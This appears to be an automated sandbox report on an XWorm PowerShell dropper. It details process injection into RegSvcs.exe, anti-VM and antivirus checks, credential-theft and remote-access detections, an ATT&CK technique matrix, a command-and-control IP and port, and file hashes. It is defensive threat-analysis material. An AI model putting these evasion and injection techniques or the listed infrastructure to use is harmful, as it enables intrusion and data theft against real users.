            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3243Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3821Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7235Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2585Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: RegSvcs.exe, 00000003.00000002.3880564789.00000000011F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FCB008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: RegSvcs.exe, 00000003.00000002.3883270268.0000000003085000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: RegSvcs.exe, 00000003.00000002.3883270268.0000000003085000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
            Source: RegSvcs.exe, 00000003.00000002.3883270268.0000000003085000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: RegSvcs.exe, 00000003.00000002.3883270268.0000000003085000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: RegSvcs.exe, 00000003.00000002.3883270268.0000000003085000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: RegSvcs.exe, 00000003.00000002.3880564789.00000000011EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7948, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7948, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            212
            Process Injection
            1
            Disable or Modify Tools
            OS Credential Dumping121
            Security Software Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            121
            Virtualization/Sandbox Evasion
            LSASS Memory2
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)212
            Process Injection
            Security Account Manager121
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Software Packing
            Cached Domain Credentials13
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1601199 Sample: rZqmN4mRco.ps1 Startdate: 28/01/2025 Architecture: WINDOWS Score: 100 17 Suricata IDS alerts for network traffic 2->17 19 Found malware configuration 2->19 21 Malicious sample detected (through community Yara rule) 2->21 23 8 other signatures 2->23 6 powershell.exe 19 2->6         started        process3 signatures4 25 Writes to foreign memory regions 6->25 27 Injects a PE file into a foreign processes 6->27 9 RegSvcs.exe 2 6->9         started        13 conhost.exe 6->13         started        process5 dnsIp6 15 176.113.115.225, 4444, 49705 SELECTELRU Russian Federation 9->15 29 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->29 signatures7

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            rZqmN4mRco.ps131%VirustotalBrowse
            rZqmN4mRco.ps124%ReversingLabsScript-PowerShell.Downloader.Amadey
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            176.113.115.2250%Avira URL Cloudsafe

            Download Network PCAP: filteredfull

            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            176.113.115.225true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1462732194.0000019B1A8CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://aka.ms/pscore68powershell.exe, 00000001.00000002.1441536967.0000019B0A681000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1441536967.0000019B0A681000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://go.micropowershell.exe, 00000001.00000002.1441536967.0000019B0AB0D000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1462732194.0000019B1A8CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Licensepowershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Iconpowershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  176.113.115.225
                                  unknownRussian Federation
                                  49505SELECTELRUtrue
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1601199
                                  Start date and time:2025-01-28 12:22:09 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 40s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:rZqmN4mRco.ps1
                                  renamed because original name is a hash value
                                  Original Sample Name:802c0cc4f3d35ffedec258400ce9f0c4b2d884db30a974e0fd6b72ffdff73fed.ps1
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winPS1@4/5@0/1
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 94%
                                  • Number of executed functions: 8
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .ps1
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target RegSvcs.exe, PID 7948 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  TimeTypeDescription
                                  06:23:09API Interceptor7x Sleep call for process: powershell.exe modified
                                  06:23:12API Interceptor7994765x Sleep call for process: RegSvcs.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  176.113.115.225011K3SJvSf.exeGet hashmaliciousXWormBrowse
                                    uPt3XcHAIA.exeGet hashmaliciousXWormBrowse
                                      qlGJTKUY7O.exeGet hashmaliciousXWormBrowse
                                        176.113.115_2.225.ps1Get hashmaliciousXWormBrowse
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          SELECTELRU011K3SJvSf.exeGet hashmaliciousXWormBrowse
                                          • 176.113.115.225
                                          uPt3XcHAIA.exeGet hashmaliciousXWormBrowse
                                          • 176.113.115.225
                                          qlGJTKUY7O.exeGet hashmaliciousXWormBrowse
                                          • 176.113.115.225
                                          176.113.115_2.225.ps1Get hashmaliciousXWormBrowse
                                          • 176.113.115.225
                                          p199AjsEFs.exeGet hashmaliciousAmadey, AsyncRAT, KeyLogger, LummaC Stealer, PureLog Stealer, ReverseShell, StealcBrowse
                                          • 176.113.115.163
                                          VbEfsnL4cp.exeGet hashmaliciousLummaC StealerBrowse
                                          • 176.113.115.215
                                          2E02vIiMfd.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, VidarBrowse
                                          • 176.113.115.96
                                          grcKLMutRS.exeGet hashmaliciousLummaC StealerBrowse
                                          • 176.113.115.215
                                          4WzIkJRbcc.exeGet hashmaliciousLummaC StealerBrowse
                                          • 176.113.115.215
                                          2r81fhbT6k.exeGet hashmaliciousLummaC StealerBrowse
                                          • 176.113.115.215
                                          No context
                                          No context
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1940658735648508
                                          Encrypted:false
                                          SSDEEP:3:NlllulJnp/p:NllU
                                          MD5:BC6DB77EB243BF62DC31267706650173
                                          SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                          SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                          SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@...e.................................X..............@..........
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):6222
                                          Entropy (8bit):3.723276965105973
                                          Encrypted:false
                                          SSDEEP:96:k4gVG0tyBCeAP8yJtkvhkvCCtZHPjQgxHLYPjQg+HL4:DgVG0tylAP1zZvjv6jS4
                                          MD5:6A14F41244D47214D6D5EF16C0E4BE4E
                                          SHA1:4A695D67142920F8E9D537737BF8F27BFEA40129
                                          SHA-256:3899B3340B3B8CA7784AB4D78C0B18E587DC3C5543B3E173AE256C0D701BCBB0
                                          SHA-512:BFCACC5567C968A2674590E9FC14E9A5CF2C030C7E7A5AC1F9C550EDB3759D3C996C4AD8DACFEA4087BE8D50E37D277903C2B37FFFE4ADD43B5A5A2BEF123F01
                                          Malicious:false
                                          Preview:...................................FL..................F.".. ......Yd....C..wq..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....O..vq......wq......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B<Z.Z..........................d...A.p.p.D.a.t.a...B.V.1.....<Z.Z..Roaming.@......EW)B<Z.Z..........................ch%.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B<Z.Z............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B<Z.Z.............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B<Z.Z....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B<Z.Z....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B<Z.Z.....0..........
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):6222
                                          Entropy (8bit):3.723276965105973
                                          Encrypted:false
                                          SSDEEP:96:k4gVG0tyBCeAP8yJtkvhkvCCtZHPjQgxHLYPjQg+HL4:DgVG0tylAP1zZvjv6jS4
                                          MD5:6A14F41244D47214D6D5EF16C0E4BE4E
                                          SHA1:4A695D67142920F8E9D537737BF8F27BFEA40129
                                          SHA-256:3899B3340B3B8CA7784AB4D78C0B18E587DC3C5543B3E173AE256C0D701BCBB0
                                          SHA-512:BFCACC5567C968A2674590E9FC14E9A5CF2C030C7E7A5AC1F9C550EDB3759D3C996C4AD8DACFEA4087BE8D50E37D277903C2B37FFFE4ADD43B5A5A2BEF123F01
                                          Malicious:false
                                          Preview:...................................FL..................F.".. ......Yd....C..wq..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....O..vq......wq......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B<Z.Z..........................d...A.p.p.D.a.t.a...B.V.1.....<Z.Z..Roaming.@......EW)B<Z.Z..........................ch%.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B<Z.Z............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B<Z.Z.............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B<Z.Z....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B<Z.Z....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B<Z.Z.....0..........
                                          File type:ASCII text, with very long lines (65481), with CRLF line terminators
                                          Entropy (8bit):5.51329593911
                                          TrID:
                                            File name:rZqmN4mRco.ps1
                                            File size:162'316 bytes
                                            MD5:c243c751841d3cce8b6d14ecd48703b7
                                            SHA1:145913260586b946f0e858635c6255b073531b71
                                            SHA256:802c0cc4f3d35ffedec258400ce9f0c4b2d884db30a974e0fd6b72ffdff73fed
                                            SHA512:b129a633e5e0fa06f3d8d5228b367b2be4ea7983041622ac19d135fb3accd9720b5199fdf3172531e9928a5e05a342fae5ff4f6c0283d7bea95d02fd6b1bf317
